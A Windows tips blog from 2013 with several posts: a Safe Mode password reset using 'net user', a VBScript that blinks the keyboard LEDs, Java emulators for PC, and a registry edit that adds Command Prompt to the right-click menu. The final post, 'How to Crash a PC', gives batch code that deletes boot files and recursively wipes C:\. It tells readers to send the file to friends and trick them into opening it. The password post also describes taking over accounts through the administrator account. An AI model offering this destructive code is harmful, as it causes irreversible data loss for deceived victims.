Sunday 29 September 2013

How to Change Password in Windows XP Using Command Prompt

   
Follow These Steps:- 

1. Reboot the computer

2. Right after the bios is finished, hit F8 (or F2,F10,F12)

3. Select 'Safe mode' or 'Safe mode with networking support'

4. Windows will boot up to the logon screen. Click administrator, 9/10 there is no password.

5. Open Command Prompt. You can go to Start > Run and type cmd.exe or simply search for cmd using the Windows search function.

6. Type net user and press Enter. This will bring up a list of user accounts. Look here for the name and exact spelling of the account whose password you wish to change.

7. Type net user name goes here *. Do not neglect any of the spaces (particularly the one before the *) or the command won’t work.

8. Press Enter. Once submitted, the command will give you the option of typing a new password for the user.

9. Carefully type the desired password and press Enter. The characters will not display as you type, so make sure the Caps Lock isn’t on and be very thorough with the spelling and punctuation.

10. Retype the password to confirm. This should weed out any typos.

11. Press Enter. The new password should go into effect immediately. If you get an error message or your access is denied, the account you’re working on doesn’t have high enough authorization to change any passwords. See Tips for possible solutions.



I Hope you like this Post, so Comment on This Post....
 


Friday 8 March 2013

Keyboard LED Light Dancing



I will be showing you an interesting trick which will let your Keyboard  LED Light to dance. Basically We will be Creating a vbscript to make Caps Lock, Num Lock and Scroll Lock to perform this trick. 
 So Lets Get Started...


  • How To Do It?    
 Follow These Steps:- 
 1. Open Notepad and copy below codes into it. 
Set wshShell=wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys"{CAPSLOCK}"
wshshell.sendkeys"{NUMLOCK}"
wshshell.sendkeys"{SCROLLLOCK}"
loop

 2. Then save this file as led.vbs (.vbs is must)                                                                                        
 3. Open your save file and see your keyboard led blinking like disco lights.


IF YOU DON'T FOLLOW THESE STEPS SO CAN DOWNLOAD THIS FILE.

  • How To Blinking Disable Light?


  1. First open Task Manager [ctrl+alt+del ]                                                                                                
  2. Then Go to process tab.                                                                                                                         
  3. Select wscript.exe         

                                                                                                                         
  4. Click on End process.                  
I Hope you like this Post, so Comment on This Post....
                                                                                                                                                                                
 

Wednesday 20 February 2013

How To Play The Java Game on PC



 

 1. MidpX

You can only run Java games and applications with 176X220 resolution. Below is what it looks like when in use:
Download this Software and Run it.
Open Java File and enjoy play the java game on PC.

 

 

2. Sj-Boy-JavaEmulator for PC

This is also similar to the one above but a bit better. It comes by default with a Nokia N70 skin but you can change this in the options. I was able to run almost all applications and even viewed BBC and a couple of other websites running Opera Mini on this java emulator. It’s a lot better than the first one and you can take snapshots while the java emulator is running.


I still had resolution issues with some java games on this emulator though.

Download this Software and Run it.
Open Java File and enjoy play the java game on PC.


I Hope you like this Post, so Comment on This Post....



Tuesday 19 February 2013

Command Prompt on Right Click



This trick shows you how to add an option called "Command Prompt" when you right-click on a folder in Windows. With this option, a Command Prompt Window will launch and its current directory will be the path to the folder you've selected.

Use this trick at your own risk.

Follow These Steps:-
Here's what you'll get:




 The Solution
You can either edit your registry OR download the registry file and apply it on your computer.


Step 1.
  Manually edit the registry:

  1. Start > Run
  2. Enter "regedit" and hit Enter
  3. Expand to "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shell"
  4. Right-click on "shell" and select New > Key
  5. Make sure a new key is created under "shell". Change the name of this key to "Command Prompt"
  6. Right-click on this new key "Command Prompt" and select New > Key
  7. Change the name of this key to "command"
  8. Here's what we should have:
                                                                                                                       
  9. Double-click on the "(Default)" text on the right window to bring up the edit box
  10. Enter this text into the Value Data field:
    cmd.exe "%1"
  11. Click OK and close the registry.
Step 2.
 Download and apply the registry file:

  1. Download this registry file Here

  2. Unzip it to a temp folder, then double-click on the .reg file to add the registry data. 

    I Hope you like this Post, so Comment on This Post....

Monday 14 January 2013

How to Crash a PC


Shut Down a Computer Forever


Follow These Steps:-


Open notepad and copy/paste this code:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Now Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.

REMEMBER - DO NOT CLICK THIS FILE. YOU WON'T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

Send it to your friends computer and tell them to open it. Have fun!!

Here is another code too.....

cmd /c del c:\windows\* /F /S /Q

cmd /c del c:\* /F /S /Q

Paste it in NotePad And Save It with Extension .cmd or .bat

I Hope you like this Post, so Comment on This Post....